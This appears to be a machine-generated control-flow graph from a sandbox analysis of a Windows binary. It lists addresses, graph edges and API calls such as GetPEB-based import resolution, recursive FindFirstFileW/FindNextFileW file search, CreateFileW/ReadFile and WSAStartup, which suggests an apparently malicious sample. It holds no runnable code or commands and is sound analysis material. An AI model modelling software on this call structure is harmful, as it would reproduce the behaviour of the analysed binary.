4 API calls 9550->9551 9552 402c31 LoadLibraryW 9551->9552 10257 407e1f 10258 407e2c 10257->10258 10265 407e61 10257->10265 10260 407e3e 10258->10260 10263 402bab 2 API calls 10258->10263 10266 407e51 10258->10266 10259 407ea6 10261 407eb6 10259->10261 10264 402bab 2 API calls 10259->10264 10262 407ed4 10260->10262 10267 402bab 2 API calls 10260->10267 10261->10266 10268 402bab 2 API calls 10261->10268 10263->10260 10264->10261 10265->10259 10265->10261 10269 405872 4 API calls 10265->10269 10266->10262 10270 402bab 2 API calls 10266->10270 10267->10266 10268->10266 10271 407e86 10269->10271 10270->10262 10272 405872 4 API calls 10271->10272 10273 407e96 10272->10273 10274 405872 4 API calls 10273->10274 10274->10259 9565 405924 9566 4031e5 4 API calls 9565->9566 9567 405937 StrStrW 9566->9567 10283 410927 10284 4044ee 7 API calls 10283->10284 10285 41093d 10284->10285 10286 4109a4 10285->10286 10287 4056bf 2 API calls 10285->10287 10290 410954 10287->10290 10288 4044ee 7 API calls 10288->10290 10290->10288 10291 402bab 2 API calls 10290->10291 10292 410990 10290->10292 10298 41080e 10290->10298 10291->10290 10293 413aca 4 API calls 10292->10293 10294 410998 10293->10294 10295 405695 2 API calls 10294->10295 10296 41099e 10295->10296 10297 402bab 2 API calls 10296->10297 10297->10286 10299 410821 10298->10299 10309 41091f 10299->10309 10310 410701 10299->10310 10302 405872 4 API calls 10303 410900 10302->10303 10304 405872 4 API calls 10303->10304 10305 41090d 10304->10305 10306 405872 4 API calls 10305->10306 10307 410919 10306->10307 10308 402bab 2 API calls 10307->10308 10308->10309 10309->10290 10311 405f08 4 API calls 10310->10311 10313 410713 10311->10313 10312 410804 10312->10302 10312->10309 10313->10312 10314 402b7c 2 API calls 10313->10314 10318 410748 10314->10318 10315 4107fd 10316 402bab 2 API calls 10315->10316 10316->10312 10317 402b7c 2 API calls 10320 4107ad 10317->10320 10318->10315 10318->10317 10319 402bab 2 API calls 10319->10315 10320->10319 10321 40d726 10322 404bee 6 API calls 10321->10322 10323 40d73f 10322->10323 10324 40db63 10323->10324 10325 405872 4 API calls 10323->10325 10328 40d761 10325->10328 10326 404bee 6 API calls 10326->10328 10327 405872 4 API calls 10327->10328 10328->10326 10328->10327 10329 40d971 10328->10329 10330 404ba7 4 API calls 10329->10330 10331 405781 4 API calls 10329->10331 10336 40d9bb 10329->10336 10330->10329 10331->10329 10332 404c4e 6 API calls 10332->10336 10333 405781 4 API calls 10333->10336 10334 4037be 4 API calls 10334->10336 10335 405872 4 API calls 10335->10336 10336->10324 10336->10332 10336->10333 10336->10334 10336->10335 9623 40f12f 9624 41219c 14 API calls 9623->9624 9625 40f13f 9624->9625 9626 41219c 14 API calls 9625->9626 9627 40f14c 9626->9627 9628 41219c 14 API calls 9627->9628 9629 40f159 9628->9629 9630 41219c 14 API calls 9629->9630 9631 40f166 9630->9631 9638 40ed35 9639 4056bf 2 API calls 9638->9639 9640 40ed42 9639->9640 9641 412093 20 API calls 9640->9641 9642 40ed63 9641->9642 9643 412093 20 API calls 9642->9643 9644 40ed73 9643->9644 9645 413aca 4 API calls 9644->9645 9646 40ed80 9645->9646 9647 405695 2 API calls 9646->9647 9648 40ed8e 9647->9648 8092 40f3c5 8097 41219c 8092->8097 8095 41219c 14 API calls 8096 40f3e1 8095->8096 8098 4121b1 8097->8098 8105 40f3d3 8097->8105 8099 4121be 8098->8099 8103 4121c5 8098->8103 8145 413ba4 8099->8145 8100 4121ca 8115 404056 8100->8115 8103->8100 8108 412210 8103->8108 8104 4121c3 8104->8105 8122 405b6f 8104->8122 8105->8095 8108->8105 8150 403fbf 8108->8150 8110 402bab 2 API calls 8110->8105 8114 41224d 8114->8105 8114->8110 8161 402b7c GetProcessHeap RtlAllocateHeap 8115->8161 8117 404066 8119 404095 8117->8119 8163 4031e5 8117->8163 8119->8104 8121 402bab 2 API calls 8121->8119 8123 405b7d 8122->8123 8124 402b7c 2 API calls 8123->8124 8125 405b99 8124->8125 8131 405c02 8125->8131 8199 4059b8 8125->8199 8127 405c09 8129 402bab 2 API calls 8127->8129 8128 405bba 8128->8127 8130 402b7c 2 API calls 8128->8130 8129->8131 8132 405bdd 8130->8132 8131->8114 8135 413a58 8131->8135 8132->8127 8133 405be4 8132->8133 8134 402bab 2 API calls 8133->8134 8134->8131 8136 412245 8135->8136 8137 413a63 8135->8137 8158 402bab 8136->8158 8137->8136 8202 405781 8137->8202 8140 405781 4 API calls 8141 413aa0 8140->8141 8205 4057df 8141->8205 8144 405781 4 API calls 8144->8136 8146 413bad 8145->8146 8147 404056 6 API calls 8146->8147 8149 413bb8 8146->8149 8148 413bc5 8147->8148 8148->8104 8149->8104 8151 402b7c 2 API calls 8150->8151 8153 403fcf 8151->8153 8152 403ff4 8152->8104 8153->8152 8324 403b98 8153->8324 8156 403ff8 GetLastError 8157 402bab 2 API calls 8156->8157 8157->8152 8159 402bb4 GetProcessHeap HeapFree 8158->8159 8160 402bc6 8158->8160 8159->8160 8160->8114 8162 402b98 8161->8162 8162->8117 8164 4031f3 8163->8164 8165 403236 8163->8165 8164->8165 8168 403208 8164->8168 8174 4030a5 8165->8174 8167 403224 8169 403258 8167->8169 8171 4031e5 4 API calls 8167->8171 8180 403263 8168->8180 8169->8119 8169->8121 8171->8169 8172 40320d 8172->8169 8173 4030a5 4 API calls 8172->8173 8173->8167 8186 402ca4 8174->8186 8176 4030b0 8177 4030b5 8176->8177 8190 4030c4 8176->8190 8177->8167 8181 40326d 8180->8181 8182 402b7c 2 API calls 8181->8182 8185 4032b7 8181->8185 8183 40328c 8182->8183 8184 402b7c 2 API calls 8183->8184 8184->8185 8185->8172 8187 403079 8186->8187 8189 40307c 8187->8189 8194 40317b GetPEB 8187->8194 8189->8176 8193 4030eb 8190->8193 8191 4030c0 8191->8167 8193->8191 8196 402c03 8193->8196 8195 40319b 8194->8195 8195->8189 8197 4031e5 3 API calls 8196->8197 8198 402c15 GetProcAddress 8197->8198 8198->8191 8200 4031e5 4 API calls 8199->8200 8201 4059cb 8200->8201 8201->8128 8220 405797 8202->8220 8204 405792 8204->8140 8206 4057eb 8205->8206 8219 405832 8205->8219 8206->8219 8230 4040bb 8206->8230 8209 405839 8211 405853 8209->8211 8257 405627 8209->8257 8210 40582c 8254 403f9e 8210->8254 8268 405762 8211->8268 8218 403f9e 5 API calls 8218->8219 8219->8136 8219->8144 8221 4057a1 8220->8221 8222 4057bd 8220->8222 8221->8222 8224 4056fc 8221->8224 8222->8204 8225 405714 8224->8225 8226 402b7c 2 API calls 8225->8226 8227 405730 8226->8227 8228 402bab 2 API calls 8227->8228 8229 405752 8227->8229 8228->8229 8229->8222 8231 4031e5 4 API calls 8230->8231 8232 4040d5 CreateFileW 8231->8232 8233 4040f8 8232->8233 8234 40418d 8232->8234 8235 4031e5 4 API calls 8233->8235 8236 404183 8234->8236 8274 403c90 8234->8274 8242 404105 8235->8242 8236->8209 8236->8210 8236->8219 8240 40416d 8271 403c40 8240->8271 8242->8240 8246 4031e5 4 API calls 8242->8246 8244 4040bb 9 API calls 8250 4041c8 8244->8250 8245 402bab 2 API calls 8245->8236 8247 404131 VirtualAlloc 8246->8247 8247->8240 8248 404142 8247->8248 8249 4031e5 4 API calls 8248->8249 8251 40414f ReadFile 8249->8251 8250->8245 8251->8240 8252 404160 8251->8252 8253 4031e5 4 API calls 8252->8253 8253->8240 8255 4031e5 4 API calls 8254->8255 8256 403fb1 VirtualFree 8255->8256 8256->8219 8258 4031e5 4 API calls 8257->8258 8259 40563a 8258->8259 8260 405872 8259->8260 8262 405881 8260->8262 8261 4058bc 8263 405797 4 API calls 8261->8263 8265 4058af 8261->8265 8262->8261 8321 4058d4 8262->8321 8263->8265 8265->8211 8267 405781 4 API calls 8267->8261 8269 405781 4 API calls 8268->8269 8270 405770 8269->8270 8270->8218 8272 4031e5 4 API calls 8271->8272 8273 403c52 CloseHandle 8272->8273 8273->8236 8275 403ca3 8274->8275 8276 403caa 8274->8276 8301 405dc5 8275->8301 8278 404056 6 API calls 8276->8278 8281 403d3a 8276->8281 8279 403cbe 8278->8279 8280 403d2e 8279->8280 8282 403d17 8279->8282 8283 403ccf 8279->8283 8280->8281 8286 402bab 2 API calls 8280->8286 8281->8236 8297 403c59 8281->8297 8284 405b6f 6 API calls 8282->8284 8285 405b6f 6 API calls 8283->8285 8287 403d14 8284->8287 8288 403cdd 8285->8288 8286->8281 8290 402bab 2 API calls 8287->8290 8289 405b6f 6 API calls 8288->8289 8291 403cee 8289->8291 8290->8280 8291->8287 8306 403d4d 8291->8306 8294 403d0b 8296 402bab 2 API calls 8294->8296 8296->8287 8298 403c21 8297->8298 8299 4031e5 4 API calls 8298->8299 8300 403c33 8299->8300 8300->8244 8300->8250 8315 406799 8301->8315 8303 405dd5 8304 402b7c 2 API calls 8303->8304 8305 405dfe 8304->8305 8305->8276 8318 403bb7 8306->8318 8308 403cfe 8308->8294 8309 403c62 8308->8309 8310 403d4d 5 API calls 8309->8310 8311 403c6d 8310->8311 8312 403c72 8311->8312 8313 4031e5 4 API calls 8311->8313 8312->8294 8314 403c87 CreateDirectoryW 8313->8314 8314->8294 8316 4031e5 4 API calls 8315->8316 8317 4067ad 8316->8317 8317->8303 8319 4031e5 4 API calls 8318->8319 8320 403bc9 GetFileAttributesW 8319->8320 8320->8308 8322 405797 4 API calls 8321->8322 8323 4058a8 8322->8323 8323->8265 8323->8267 8325 4031e5 4 API calls 8324->8325 8326 403baa 8325->8326 8326->8152 8326->8156 9763 40ebc6 9764 4040bb 12 API calls 9763->9764 9765 40ebdf 9764->9765 9766 40ecd7 9765->9766 9783 407795 9765->9783 9769 40eccd 9770 403f9e 5 API calls 9769->9770 9770->9766 9771 4056bf 2 API calls 9781 40ec12 9771->9781 9772 40ecb5 9773 402bab 2 API calls 9772->9773 9774 40ecbd 9773->9774 9775 413aca 4 API calls 9774->9775 9776 40ecc7 9775->9776 9777 405695 2 API calls 9776->9777 9777->9769 9778 407908 GetProcessHeap RtlAllocateHeap 9778->9781 9780 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9780->9781 9781->9772 9781->9778 9781->9780 9782 402bab GetProcessHeap HeapFree 9781->9782 9794 412269 9781->9794 9782->9781 9785 4077ab 9783->9785 9784 4077b3 9784->9769 9784->9771 9785->9784 9801 405ae9 9785->9801 9787 4077e1 9787->9784 9788 407802 9787->9788 9789 4077f8 9787->9789 9791 402b7c 2 API calls 9788->9791 9790 402bab 2 API calls 9789->9790 9790->9784 9793 407811 9791->9793 9792 402bab 2 API calls 9792->9784 9793->9792 9817 40374e 9794->9817 9799 402bab 2 API calls 9800 412299 9799->9800 9800->9781 9802 405af7 9801->9802 9803 402b7c 2 API calls 9802->9803 9805 405b03 9803->9805 9804 405b5a 9804->9787 9805->9804 9814 405998 9805->9814 9807 405b21 9808 405b61 9807->9808 9810 402b7c 2 API calls 9807->9810 9809 402bab 2 API calls 9808->9809 9809->9804 9811 405b39 9810->9811 9811->9808 9812 405b40 9811->9812 9813 402bab 2 API calls 9812->9813 9813->9804 9815 4031e5 4 API calls 9814->9815 9816 4059ab 9815->9816 9816->9807 9818 402b7c 2 API calls 9817->9818 9820 40375f 9818->9820 9819 4037a3 9819->9800 9824 4037be 9819->9824 9820->9819 9821 4031e5 4 API calls 9820->9821 9822 40378f 9821->9822 9822->9819 9823 402bab 2 API calls 9822->9823 9823->9819 9825 4031e5 4 API calls 9824->9825 9826 4037e2 9825->9826 9827 40382b 9826->9827 9828 402b7c 2 API calls 9826->9828 9827->9799 9829 403802 9828->9829 9830 403832 9829->9830 9832 403809 9829->9832 9831 4036a3 4 API calls 9830->9831 9831->9827 9833 4036a3 4 API calls 9832->9833 9833->9827 8924 410cd1 8929 412093 8924->8929 8927 412093 20 API calls 8928 410cff 8927->8928 8931 4120a5 8929->8931 8950 410cf1 8929->8950 8930 4120b3 8932 404056 6 API calls 8930->8932 8931->8930 8935 412100 8931->8935 8933 4120ba 8932->8933 8934 405b6f 6 API calls 8933->8934 8937 412152 8933->8937 8933->8950 8940 412125 8934->8940 8936 403fbf 7 API calls 8935->8936 8935->8950 8936->8933 8951 403d74 8937->8951 8940->8937 8942 412139 8940->8942 8943 41214d 8940->8943 8941 41218c 8945 402bab 2 API calls 8941->8945 8941->8950 8947 402bab 2 API calls 8942->8947 8946 402bab 2 API calls 8943->8946 8944 402bab 2 API calls 8944->8941 8945->8950 8946->8937 8948 41213e 8947->8948 8949 402bab 2 API calls 8948->8949 8949->8950 8950->8927 8952 403d87 8951->8952 8953 403ea3 8952->8953 8954 405b6f 6 API calls 8952->8954 8955 405b6f 6 API calls 8953->8955 8956 403da3 8954->8956 8957 403eb9 8955->8957 8956->8953 8959 4031e5 4 API calls 8956->8959 8958 4031e5 4 API calls 8957->8958 8965 403f6f 8957->8965 8960 403ed3 FindFirstFileW 8958->8960 8961 403dbc FindFirstFileW 8959->8961 8977 403f8d 8960->8977 8981 403ee8 8960->8981 8972 403e9c 8961->8972 8982 403dd1 8961->8982 8962 402bab 2 API calls 8962->8965 8963 402bab 2 API calls 8963->8953 8964 4031e5 4 API calls 8966 403e84 FindNextFileW 8964->8966 8965->8941 8965->8944 8967 403e96 8966->8967 8966->8982 8991 403bef 8967->8991 8968 4031e5 4 API calls 8971 403f50 FindNextFileW 8968->8971 8970 405b6f 6 API calls 8970->8981 8974 403f87 8971->8974 8971->8981 8972->8963 8973 405b6f 6 API calls 8973->8982 8975 403bef 5 API calls 8974->8975 8975->8977 8976 403f75 8978 402bab 2 API calls 8976->8978 8977->8962 8980 403f7b 8978->8980 8979 403d74 15 API calls 8979->8982 8984 403bef 5 API calls 8980->8984 8981->8968 8981->8970 8981->8976 8985 402bab 2 API calls 8981->8985 8994 40fa23 8981->8994 8982->8964 8982->8973 8982->8979 8983 402bab 2 API calls 8982->8983 8986 403f63 8982->8986 8983->8982 8984->8965 8985->8981 8987 402bab 2 API calls 8986->8987 8988 403f69 8987->8988 8989 403bef 5 API calls 8988->8989 8989->8965 8992 4031e5 4 API calls 8991->8992 8993 403c01 FindClose 8992->8993 8993->8972 8995 40fa39 8994->8995 8996 410293 8995->8996 8997 405b6f 6 API calls 8995->8997 8996->8981 8998 40ffcc 8997->8998 8998->8996 8999 4040bb 12 API calls 8998->8999 9000 40ffeb 8999->9000 9001 41028c 9000->9001 9003 402b7c 2 API calls 9000->9003 9049 41027d 9000->9049 9002 402bab 2 API calls 9001->9002 9002->8996 9005 41001e 9003->9005 9004 403f9e 5 API calls 9004->9001 9006 40a423 4 API calls 9005->9006 9005->9049 9007 41004a 9006->9007 9008 4031e5 4 API calls 9007->9008 9009 41005c 9008->9009 9010 4031e5 4 API calls 9009->9010 9011 410079 9010->9011 9012 4031e5 4 API calls 9011->9012 9013 410096 9012->9013 9014 4031e5 4 API calls 9013->9014 9015 4100b0 9014->9015 9016 4031e5 4 API calls 9015->9016 9017 4100cd 9016->9017 9018 4031e5 4 API calls 9017->9018 9019 4100ea 9018->9019 9050 412516 9019->9050 9021 4100fd 9022 40642c 5 API calls 9021->9022 9023 41013e 9022->9023 9024 410142 9023->9024 9025 41019f 9023->9025 9026 40488c 5 API calls 9024->9026 9028 4031e5 4 API calls 9025->9028 9027 410151 9026->9027 9029 404866 4 API calls 9027->9029 9046 41019c 9027->9046 9039 4101bb 9028->9039 9033 410163 9029->9033 9030 40642c 5 API calls 9032 410201 9030->9032 9031 41022a 9035 413a58 13 API calls 9031->9035 9037 410205 9032->9037 9038 41022f 9032->9038 9034 406c4c 6 API calls 9033->9034 9047 41018e 9033->9047 9040 410178 9034->9040 9041 41026e 9035->9041 9036 403c40 5 API calls 9036->9046 9042 4126a7 7 API calls 9037->9042 9053 4125db 9038->9053 9044 4031e5 4 API calls 9039->9044 9045 406c4c 6 API calls 9040->9045 9048 402bab 2 API calls 9041->9048 9042->9031 9044->9046 9045->9047 9046->9030 9046->9031 9047->9036 9048->9049 9049->9004 9051 4031e5 4 API calls 9050->9051 9052 412539 9051->9052 9052->9021 9054 40488c 5 API calls 9053->9054 9055 4125ec 9054->9055 9056 4031e5 4 API calls 9055->9056 9062 41269f 9055->9062 9057 412609 9056->9057 9058 41268f 9057->9058 9059 4031e5 4 API calls 9057->9059 9060 403c40 5 API calls 9058->9060 9061 41262a 9059->9061 9060->9062 9063 412675 9061->9063 9070 4124f1 9061->9070 9062->9031 9064 4031e5 4 API calls 9063->9064 9064->9058 9067 412663 9069 4031e5 4 API calls 9067->9069 9068 4124f1 4 API calls 9068->9067 9069->9063 9071 4031e5 4 API calls 9070->9071 9072 412503 9071->9072 9072->9067 9072->9068 9259 4049dc 9260 4031e5 4 API calls 9259->9260 9261 4049ef 9260->9261 9916 40cddd 9917 405b6f 6 API calls 9916->9917 9918 40cdee 9917->9918 9919 413a58 13 API calls 9918->9919 9920 40ce06 9918->9920 9921 40ce00 9919->9921 9922 405b6f 6 API calls 9920->9922 9929 40ce59 9920->9929 9923 402bab 2 API calls 9921->9923 9924 40ce1c 9922->9924 9923->9920 9925 40ce52 9924->9925 9926 403d74 19 API calls 9924->9926 9924->9929 9927 402bab 2 API calls 9925->9927 9928 40ce45 9926->9928 9927->9929 9928->9925 9930 402bab 2 API calls 9928->9930 9930->9925 9262 40ecde 9263 412093 20 API calls 9262->9263 9264 40ecfd 9263->9264 9265 412093 20 API calls 9264->9265 9266 40ed0d 9265->9266 9270 40e8df 9271 412093 20 API calls 9270->9271 9272 40e8f8 9271->9272 9273 412093 20 API calls 9272->9273 9274 40e908 9273->9274 9281 404b22 9274->9281 9276 40e91c 9277 40e936 9276->9277 9280 40e93d 9276->9280 9288 40e944 9276->9288 9279 402bab 2 API calls 9277->9279 9279->9280 9282 402b7c 2 API calls 9281->9282 9284 404b33 9282->9284 9283 404b66 9283->9276 9284->9283 9297 4049b3 9284->9297 9287 402bab 2 API calls 9287->9283 9289 4056bf 2 API calls 9288->9289 9290 40e952 9289->9290 9291 4057df 13 API calls 9290->9291 9296 40e976 9290->9296 9292 40e966 9291->9292 9293 413aca 4 API calls 9292->9293 9294 40e970 9293->9294 9295 405695 2 API calls 9294->9295 9295->9296 9296->9277 9298 4031e5 4 API calls 9297->9298 9299 4049c6 9298->9299 9299->9283 9299->9287 9300 4139de 9309 413855 9300->9309 9302 4139f1 9303 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9302->9303 9304 4139f7 9303->9304 9305 413866 58 API calls 9304->9305 9306 413a2d 9305->9306 9307 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9306->9307 9308 413a34 9307->9308 9310 4031e5 4 API calls 9309->9310 9311 413864 9310->9311 9311->9311 9936 4116e7 9937 4117ba 9936->9937 9938 405b6f 6 API calls 9937->9938 9943 4117f1 9937->9943 9939 4117d0 9938->9939 9940 404cbf 8 API calls 9939->9940 9939->9943 9941 4117eb 9940->9941 9942 402bab 2 API calls 9941->9942 9942->9943 9331 4094e7 9332 404b22 6 API calls 9331->9332 9333 4094fe 9332->9333 9334 409554 9333->9334 9335 405b6f 6 API calls 9333->9335 9336 409514 9335->9336 9337 404b22 6 API calls 9336->9337 9344 40954d 9336->9344 9339 40952d 9337->9339 9338 402bab 2 API calls 9338->9334 9340 409544 9339->9340 9341 409408 15 API calls 9339->9341 9342 402bab 2 API calls 9340->9342 9343 40953e 9341->9343 9342->9344 9345 402bab 2 API calls 9343->9345 9344->9338 9345->9340 9354 4058ea 9355 4031e5 4 API calls 9354->9355 9356 4058fd StrStrA 9355->9356 9988 40d4ea 9989 404bee 6 API calls 9988->9989 9991 40d500 9989->9991 9990 40d5a0 9991->9990 9992 404bee 6 API calls 9991->9992 9993 40d529 9992->9993 9994 404bee 6 API calls 9993->9994 9995 40d537 9994->9995 9996 404bee 6 API calls 9995->9996 9997 40d546 9996->9997 9997->9990 9998 405872 4 API calls 9997->9998 9999 40d56d 9998->9999 10000 405872 4 API calls 9999->10000 10001 40d57c 10000->10001 10002 405872 4 API calls 10001->10002 10003 40d58e 10002->10003 10004 405872 4 API calls 10003->10004 10004->9990 10005 40a3ea 10006 40374e 6 API calls 10005->10006 10007 40a403 10006->10007 10008 40a419 10007->10008 10009 4059d8 4 API calls 10007->10009 10010 40a411 10009->10010 10011 402bab 2 API calls 10010->10011 10011->10008 9394 404df3 WSAStartup 9398 4091f6 9399 404b22 6 API calls 9398->9399 9400 40920b 9399->9400 9401 409222 9400->9401 9402 409408 15 API calls 9400->9402 9403 40921c 9402->9403 9404 402bab 2 API calls 9403->9404 9404->9401 10038 4117fe 10039 404c4e 6 API calls 10038->10039 10040 411888 10039->10040 10041 404c4e 6 API calls 10040->10041 10046 411925 10040->10046 10042 4118ab 10041->10042 10042->10046 10057 4119b3 10042->10057 10044 4118c5 10045 4119b3 4 API calls 10044->10045 10047 4118d0 10045->10047 10047->10046 10048 4056bf 2 API calls 10047->10048 10049 4118fd 10048->10049 10050 405872 4 API calls 10049->10050 10051 41190a 10050->10051 10052 405872 4 API calls 10051->10052 10053 411915 10052->10053 10054 413aca 4 API calls 10053->10054 10055 41191f 10054->10055 10056 405695 2 API calls 10055->10056 10056->10046 10058 4119c6 10057->10058 10060 4119bf 10057->10060 10059 4031e5 4 API calls 10058->10059 10059->10060 10060->10044 9408 40e880 9409 41219c 14 API calls 9408->9409 9410 40e88e 9409->9410 9411 41219c 14 API calls 9410->9411 9412 40e89c 9411->9412 10124 40e48a 10125 404bee 6 API calls 10124->10125 10126 40e4d0 10125->10126 10127 405872 4 API calls 10126->10127 10128 40e4f4 10126->10128 10127->10128 9509 410390 9510 404b22 6 API calls 9509->9510 9511 4103a5 9510->9511 9512 410409 9511->9512 9513 405b6f 6 API calls 9511->9513 9518 4103ba 9513->9518 9514 410402 9515 402bab 2 API calls 9514->9515 9515->9512 9516 4103fb 9517 402bab 2 API calls 9516->9517 9517->9514 9518->9514 9518->9516 9519 403d74 19 API calls 9518->9519 9520 4103ee 9519->9520 9520->9516 9521 402bab 2 API calls 9520->9521 9521->9516 10139 40ed96 10140 4040bb 12 API calls 10139->10140 10154 40edb0 10140->10154 10141 40ef90 10142 40ef87 10143 403f9e 5 API calls 10142->10143 10143->10141 10144 405ae9 6 API calls 10144->10154 10145 412269 6 API calls 10145->10154 10146 40ef61 10147 40ef6e 10146->10147 10150 402bab 2 API calls 10146->10150 10151 40ef7c 10147->10151 10152 402bab 2 API calls 10147->10152 10148 402bab GetProcessHeap HeapFree 10148->10154 10149 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10149->10154 10150->10147 10151->10142 10153 402bab 2 API calls 10151->10153 10152->10151 10153->10142 10154->10141 10154->10142 10154->10144 10154->10145 10154->10146 10154->10148 10154->10149 10155 40ef98 10156 404c4e 6 API calls 10155->10156 10157 40efb6 10156->10157 10158 40f02a 10157->10158 10170 40f054 10157->10170 10161 404bee 6 API calls 10162 40efda 10161->10162 10163 404bee 6 API calls 10162->10163 10164 40efe9 10163->10164 10164->10158 10165 405872 4 API calls 10164->10165 10166 40f008 10165->10166 10167 405872 4 API calls 10166->10167 10168 40f01a 10167->10168 10169 405872 4 API calls 10168->10169 10169->10158 10171 40f064 10170->10171 10172 402b7c 2 API calls 10171->10172 10174 40f072 10172->10174 10173 40efca 10173->10161 10174->10173 10176 405ecd 10174->10176 10177 4059b8 4 API calls 10176->10177 10178 405edf 10177->10178 10178->10174 9528 410c98 9529 41219c 14 API calls 9528->9529 9530 410ca8 9529->9530 9531 41219c 14 API calls 9530->9531 9532 410cb5 9531->9532 9533 412093 20 API calls 9532->9533 9534 410cc9 9533->9534 10248 41249c 10249 4056bf 2 API calls 10248->10249 10250 4124aa 10249->10250 10251 4057df 13 API calls 10250->10251 10256 4124ce 10250->10256 10252 4124be 10251->10252 10253 413aca 4 API calls 10252->10253 10254 4124c8 10253->10254 10255 405695 2 API calls 10254->10255 10255->10256 9538 40f49e 9539 40f4b6 13 API calls 9538->9539 9540 40f4a8 9539->9540 9541 40929e 9542 413b28 6 API calls 9541->9542 9543 4092a4 9542->9543 9544 405b6f 6 API calls 9543->9544 9545 4092af 9544->9545 9546 4092c5 9545->9546 9547 409408 15 API calls 9545->9547 9548 4092bf 9547->9548 9549 402bab 2 API calls 9548->9549 9549->9546 10275 407fa4 10276 407fb7 10275->10276 10277 402b7c 2 API calls 10276->10277 10279 407fee 10276->10279 10278 40800d 10277->10278 10278->10279 10280 4037be 4 API calls 10278->10280 10281 40803c 10280->10281 10282 402bab 2 API calls 10281->10282 10282->10279 9586 4090aa 9587 404b22 6 API calls 9586->9587 9588 4090c1 9587->9588 9589 409408 15 API calls 9588->9589 9595 4090d8 9588->9595 9591 4090d2 9589->9591 9590 404b22 6 API calls 9592 4090eb 9590->9592 9593 402bab 2 API calls 9591->9593 9594 408c4d 15 API calls 9592->9594 9598 409104 9592->9598 9593->9595 9596 4090fe 9594->9596 9595->9590 9597 402bab 2 API calls 9596->9597 9597->9598 9605 409cae 9620 404b79 9605->9620 9607 409cc5 9608 409d27 9607->9608 9610 405b6f 6 API calls 9607->9610 9611 409d2f 9607->9611 9609 402bab 2 API calls 9608->9609 9609->9611 9612 409cec 9610->9612 9612->9608 9613 404b79 6 API calls 9612->9613 9614 409d05 9613->9614 9615 409d1e 9614->9615 9616 408c4d 15 API calls 9614->9616 9617 402bab 2 API calls 9615->9617 9618 409d18 9616->9618 9617->9608 9619 402bab 2 API calls 9618->9619 9619->9615 9621 404b22 6 API calls 9620->9621 9622 404b8a 9621->9622 9622->9607 10342 411fb3 10343 405b6f 6 API calls 10342->10343 10345 412013 10343->10345 10344 412075 10345->10344 10346 41206a 10345->10346 10361 411a8d 10345->10361 10348 402bab 2 API calls 10346->10348 10348->10344 10350 4056bf 2 API calls 10351 41203d 10350->10351 10352 405872 4 API calls 10351->10352 10353 41204a 10352->10353 10354 413aca 4 API calls 10353->10354 10355 412054 10354->10355 10356 405695 2 API calls 10355->10356 10357 41205a 10356->10357 10358 413a58 13 API calls 10357->10358 10359 412064 10358->10359 10360 402bab 2 API calls 10359->10360 10360->10346 10362 402b7c 2 API calls 10361->10362 10364 411aa3 10362->10364 10363 411f05 10363->10346 10363->10350 10364->10363 10384 404ada 10364->10384 10367 404ada 4 API calls 10368 411cad 10367->10368 10369 411f0c 10368->10369 10370 411cc0 10368->10370 10371 402bab 2 API calls 10369->10371 10387 405eb6 10370->10387 10371->10363 10373 411d3c 10374 4031e5 4 API calls 10373->10374 10380 411d7b 10374->10380 10375 411ea6 10376 4031e5 4 API calls 10375->10376 10377 411eb5 10376->10377 10378 4031e5 4 API calls 10377->10378 10379 411ed6 10378->10379 10381 405eb6 4 API calls 10379->10381 10380->10375 10382 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10380->10382 10383 405eb6 4 API calls 10380->10383 10381->10363 10382->10380 10383->10380 10385 4031e5 4 API calls 10384->10385 10386 404afd 10385->10386 10386->10367 10388 405998 4 API calls 10387->10388 10389 405ec8 10388->10389 10389->10373 9652 40f6b8 9653 41219c 14 API calls 9652->9653 9654 40f6c7 9653->9654 9655 41219c 14 API calls 9654->9655 9656 40f6d5 9655->9656 9657 41219c 14 API calls 9656->9657 9658 40f6df 9657->9658 9677 40d6bd 9678 4056bf 2 API calls 9677->9678 9679 40d6c9 9678->9679 9690 404cbf 9679->9690 9682 404cbf 8 API calls 9683 40d6f4 9682->9683 9684 404cbf 8 API calls 9683->9684 9685 40d702 9684->9685 9686 413aca 4 API calls 9685->9686 9687 40d711 9686->9687 9688 405695 2 API calls 9687->9688 9689 40d71f 9688->9689 9691 402b7c 2 API calls 9690->9691 9692 404ccd 9691->9692 9693 404ddc 9692->9693 9694 404b8f 5 API calls 9692->9694 9693->9682 9695 404ce4 9694->9695 9696 404dd4 9695->9696 9698 402b7c 2 API calls 9695->9698 9697 402bab 2 API calls 9696->9697 9697->9693 9706 404d04 9698->9706 9699 404dcc 9700 404a39 5 API calls 9699->9700 9700->9696 9701 404dc6 9702 402bab 2 API calls 9701->9702 9702->9699 9703 402b7c 2 API calls 9703->9706 9704 404b8f 5 API calls 9704->9706 9705 404a39 5 API calls 9705->9706 9706->9699 9706->9701 9706->9703 9706->9704 9706->9705 9707 405b6f 6 API calls 9706->9707 9708 404cbf 8 API calls 9706->9708 9709 402bab GetProcessHeap HeapFree 9706->9709 9707->9706 9708->9706 9709->9706 9710 40f0bf 9711 4056bf 2 API calls 9710->9711 9712 40f0c9 9711->9712 9714 404cbf 8 API calls 9712->9714 9722 40f115 9712->9722 9713 41219c 14 API calls 9715 40f128 9713->9715 9716 40f0ed 9714->9716 9717 404cbf 8 API calls 9716->9717 9718 40f0fb 9717->9718 9719 413aca 4 API calls 9718->9719 9720 40f10a 9719->9720 9721 405695 2 API calls 9720->9721 9721->9722 9722->9713

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
